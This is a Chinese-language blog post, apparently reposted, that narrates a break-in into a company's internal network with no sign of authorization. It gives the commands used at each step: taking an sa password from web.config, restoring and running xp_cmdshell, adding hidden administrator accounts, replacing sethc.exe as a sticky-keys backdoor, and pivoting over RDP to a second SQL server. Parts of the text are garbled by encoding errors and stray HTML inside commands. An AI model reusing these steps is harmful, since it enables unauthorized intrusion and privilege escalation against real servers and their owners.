圖文：udb311

主題：MSSQL內(nèi)網(wǎng)滲透案例分析

發(fā)表：黑白前線

描述：對(duì)于內(nèi)網(wǎng)滲透技術(shù)一直感覺很神秘，手中正巧有一個(gè)webshell是內(nèi)網(wǎng)服務(wù)器。借此機(jī)會(huì)練習(xí)下內(nèi)網(wǎng)入侵滲透技術(shù)！本文敏感信息以屏蔽！密碼都以*號(hào)代替。此次過程主要運(yùn)用到xp_cmdshell恢復(fù)與執(zhí)行，再通過自己的靈活思維運(yùn)用。

環(huán)境：2003 SERVER

IIS ：6.0 支持php

數(shù)據(jù)庫(kù)：MSSQL和MYSQL

網(wǎng)站類型：ASPX

本文重點(diǎn)講述內(nèi)網(wǎng)滲透提權(quán)部分，對(duì)于WEBSHELL不在描述。對(duì)于了解入侵滲透的朋友都知道，拿到webshell后服務(wù)器能否提權(quán)就要先找提權(quán) 的漏洞所在。從本站的角度來(lái)看，存在MSSQL、MYSQL支持ASPX和PHP可以說權(quán)限夠大的了。先來(lái)看看目錄能窮舉出來(lái)哪些東西。先看程序目錄，很 平常么。沒現(xiàn)有SU和MYSQL之類的信息。

E：盤可以瀏覽

F：盤可以瀏覽

本站ASPX 類型網(wǎng)站，使用的是MSSQL數(shù)據(jù)庫(kù)。顯示密碼不是最高權(quán)限的用戶，就是是個(gè)DB用戶提權(quán)也不能馬上到手。

再翻翻別的站點(diǎn)，目錄可以瀏覽一個(gè)個(gè)找吧。發(fā)現(xiàn)一個(gè)目錄web.config有SA用戶

連接數(shù)據(jù)庫(kù)信息：

Source=gzzx;Initial Catalog=SMSCenter;Persist Security Info=True;User ID=sa;Password=****" 打開aspxspy，使用database連接功能。

登錄成功，顯示SA看來(lái)應(yīng)該沒有降權(quán)。

連接狀態(tài)是MSSQL 2005，要先啟xp_cmdshell.

接著執(zhí)行下命令"whoami.html' target='_blank'>whoami"

good，system 權(quán)限，下面就是添加一個(gè)賬號(hào)了。。

Exec master.dbo.xp_cmdshell 'net user admin **** /add'

Exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

再看下3389端口是否開啟

Exec master.dbo.xp_cmdshell 'stat.html' target='_blank'>netstat -ano'

OK,狀態(tài)正常。

Exec master.dbo.xp_cmdshell 'ipconfig /all'顯示配置是內(nèi)網(wǎng)IP

通過域名解析到的IP連接3389，可以連接。

說明管理做了端口映射，這就不要轉(zhuǎn)發(fā)端口了。省了很多功夫！

這才拿到了一臺(tái)服務(wù)器的權(quán)限，從網(wǎng)站的SQL連接上不難發(fā)現(xiàn)內(nèi)網(wǎng)還有SQL服務(wù)器。

滲透繼續(xù)……

內(nèi)網(wǎng)IP為200，同樣是MSSQL SA權(quán)限。

再利用aspxspy 數(shù)據(jù)庫(kù)連接，

郁悶的事情發(fā)生了，不能連接。

[DBNETLIB][ConnectionOpen (Connect()).]SQL Server 不存在或拒絕訪問。

按道理講數(shù)據(jù)庫(kù)能使用的情況下應(yīng)該可以成功連接上的，難道沒有配置TCP/IP訪問數(shù)據(jù)庫(kù)？疑問產(chǎn)生了，無(wú)耐之下通過3389上到服務(wù)器上來(lái)試試。服務(wù)器安裝了MSSQL，有查詢分析器和企業(yè)管理器。這又成了我們的工具。呵呵！

SQL分析器連接之，仍然無(wú)法連接。

先測(cè)試下所在的MSSQL服務(wù)器機(jī)器的存在性。

成功響應(yīng)，說明服務(wù)器存在。

運(yùn)行mstsc試著3389連接下，顯示了一個(gè)xp的界面。比較郁悶耶。

試下名稱解析服務(wù)。。。

點(diǎn)擊瀏覽一看，這么多MSSQL服務(wù)器名還真不知道哪臺(tái)是的。觀察下發(fā)現(xiàn)200和IP200的機(jī)器有些相近。輸入SA及密碼。

成功返回查詢窗口。試下xp_cmdshell

發(fā)現(xiàn)不存在，恢復(fù)之

Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')

OK！

執(zhí)行命令"whoami",雖然XP不支持whoami命令。

exec xp_cmdshell 'net user 123 123 /add'

提示系統(tǒng)錯(cuò)誤。不是沒權(quán)限添加。。。。不明真像了。。。

思路：開了3389可以用sethc.exe 替換來(lái)。。。

exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'替換之？

問題又來(lái)了，提示磁盤文件不足。

利用xp_dirtree查看下C盤

EXEC MASTER..XP_dirtree 'c:',1,1

列出文件目錄，刪除一個(gè)數(shù)據(jù)庫(kù)的備份

再執(zhí)行exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'

提示一個(gè)文件被復(fù)制，說明成功。3389 5次shift未彈出。

再試下

exec xp_cmdshell 'net user 123 123 /add' 提示成功。原來(lái)開始是空間不足導(dǎo)致的系統(tǒng)錯(cuò)誤啊。真像揭開！

exec xp_cmdshell 'net localgroup administrator 123 /add'

3389登錄之。。

exec xp_cmdshell 'net user 123 /del'刪除用戶

內(nèi)網(wǎng)還存在很多機(jī)器，此次滲透就此結(jié)束。。。

總結(jié)：內(nèi)網(wǎng)從端口轉(zhuǎn)發(fā)到外部連接，再?gòu)?389登錄內(nèi)部3389 跟跳板技術(shù)差不多。

總結(jié)

以上是生活随笔為你收集整理的内网中入侵linux系统,MSSQL 入侵提权之内网渗透案例分析的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。